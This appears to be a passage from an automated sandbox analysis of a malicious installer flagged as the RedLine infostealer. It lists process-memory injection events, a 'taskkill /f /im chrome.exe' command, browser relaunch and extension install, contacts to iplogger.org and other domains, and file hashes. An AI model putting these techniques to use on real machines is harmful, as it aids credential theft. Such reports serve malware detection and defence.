PID 3436 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4496 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4496 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3148 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3776 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 3868 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2076 wrote to memory of 4528 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffff846cc40,0x7ffff846cc4c,0x7ffff846cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1856,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1848 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1824,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4520 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4972,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5220,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5256,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5396,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5276 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5280,i,9421900835783662441,11684518526042440307,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.179.234:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 142.250.179.234:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 216.58.201.110:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 1.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4e52a7e6ab05faaaf0e0c605191c63e2
SHA1 c464190eb817eac2de38fa811d0d0772fe8f5d19
SHA256 c062762a6f174bfe3bf436cee08376113d2fef597ba32e583e1c54c2c5e5eac0
SHA512 86107d0c56b6130cb56e6814e6b18f7790ba0398b89ec13203515765a84f4acaa360205fa253439084affcfa7ea38dbfd073249c7c5dd9d12e921e7a582ec0e9

\??\pipe\crashpad_2076_GMEPVPYZFBNKHOGN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\c14d1030-f8e4-4e28-89e8-4bb48fbd4b98.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

C:\Users\Admin\AppData\Local\Temp\scoped_dir2076_2137306157\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 be99c97ee7b4689fcb347cba2c8b980c
SHA1 0474871973d111ceb8ab3ba6f7e695ad03bb961d
SHA256 f044328b1d19ab3ab6db38cff6a908c98599ef38258d93575ae09f0bfbc37bc9
SHA512 9c2d0150cad799bf073345665e4edb444c69ed233cc5e551cf15463303d8edc29e72fa9f22b39a9835954ea8595e60522afc1aabc31abe6a45c34d4a165cc971

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 85be8f3856639024fde5a5a52194734a
SHA1 74ad593c3a46a0b8c6a4c877745c48403d8d22dc
SHA256 1c5b6d645e6a1f259efe5766d5f112aee89c7082e0aff5018c1bda04cab240f9
SHA512 6e2babde21f5cd8a1c571968f44d31cc952c4dd1fb320c415822fe30eef7f036e9e67c90d20baa9743675863625887541a58ffe04cc81f9566f5b692ff6b4a2c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e11f24ae7f06e7c8448cecef71bcc237
SHA1 96f1821f053049b745b4d729370fb3db276d59b2
SHA256 87eaa0fdb7be4f26ea364f1835a639d641dfceeb4e7f0aa0945b545c83337cdb
SHA512 2ea25b60a6a94e2fcf88c5f8cac6616fa1a85b53358e53d9085387d823ec2a9766b10d97f59d594d69e7730dac5cd0b5a6c079cd9eb124d786989cf6d1370604

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b4133c435daa68294978e2168a25e5d4
SHA1 6ba43b0d9978a48779d46b76ec796fc43dbfe8d9
SHA256 600101eed503a89b2ef24bf44ebe20f23b7bdc7567710d154c9e1a3af53a3536
SHA512 beeb8bb682cd0f58349e87e9a52b3280d9504c29fe238a63b5bfa69cc3820b155f576fce46d33eba8ea83a886465215eb076eb1247c35a3e5c6ef7d6b9aa5d41

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0eb40ea879646393cc2f439108fe7d33
SHA1 247cc0b1cdfe3a41dc00ea1a9cc872c482e3b755
SHA256 13aff694a5735db40097aee41177a9c9bceb36220e40424d3ca568954d468383
SHA512 3fcacc41966adfb2cc407d1f9f26008e2a5900899b79fd19bc19339eafabae98cf352378ac0354517253681c94e46690d1f54e5ddc7f4ff090491841f0c2c134

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 48a139a520597dbafc8ac128d7acc83c
SHA1 88691b6f2ee44341178d5981f64cd7a546055ae6
SHA256 dbd69ae435343d0cd52dfef39e2b81fe6b3ae5cc2d597ed62b22ab169769a852
SHA512 91136fd76b6dbf7a6f28184af6387defc0a2ef62a8d4a6a96baefc03400bfb0a4be6f9f9a08716f7d19cb035b91e92fd297f3a49551e4a89521200ff69914822

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 47fe52e1e31c5e985232287d2dd5f96d
SHA1 c6a5dcb647c13cb52e94bb85cb183d46b0cd96a2
SHA256 cbcf7c874e27b6fd8c0912bd84f84e05ce1be3d93e2dc8fb50a39d6cc2473fe0
SHA512 fd4aff4789cc5a61296f7cf92fa783926e04529252fde51ceb8d5c866af440847be22126430a843f4b253a51282f2c0fb3fcef118a99567eaccbf52b51193bd0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a6abcd4c66cf2019e7211864fed3df5f
SHA1 6822d9b3136b091d8807da8bd343ae83379f895f
SHA256 6ddd94b2ca8ea29aa06fd646bc896bfe6bae499ef2bea26ed421597b1a22dfc3
SHA512 c2e9dc3908963f18a9cdfe62d3070e7f92e91cc8e41dadd60bffdbce53c0f4344eed543fbd3c0282f10123d107d2750ddb89910d7906ceae1a868397deaba45b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 131fb3f0828a39bfdaa7de0dd3c3f186
SHA1 56d61b407b342afb59ac41c3082e5aea93bbcdb8
SHA256 55b1163d7d9df4a3d80fbd3a02dc59504c633b24837b6ae181205907bc25b93e
SHA512 0a63e50ba6968e84c68e0a7094dd499abe51d3e2ac6e8fb28e55d9c6c07996d54b60c413b32aa97b236919b6cbb88586afa297da41cb30d16b15c47123465421

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 dc6148c321c3b0461a0197514989afb6
SHA1 e246cdf29769aebc0baa6264efd1b7fec7991827
SHA256 781a09fd4eab5bed5d81492580b4cf5f948491f67463b2162edfe721e214cac4
SHA512 b951a70135fac2c7f430f2de18f4fc539d21113d13dd300c5f01ff0287af44e9cf15d921b8e4c19858f957db8d4164a6da45ee1754fbebb1f80914c4cdd4fdb9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a7abbb191a4226ac8e9d9dd604f899ed
SHA1 defd272c65c333681a7437dec99f046b69a013c8
SHA256 616fcef3c0ac8296e506bf7c741cfe9eeffaa56150bfb186a712152f620e8dc0
SHA512 937424bae3e2bfca4ce068bd4a011d213c71c2362118f89b4aaed47cecdda7c2253eb4ff1c6eb46c61b0c9a00626765dd30d91117c89e09685f658415c36cba8

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win7-20240903-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3052 set thread context of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
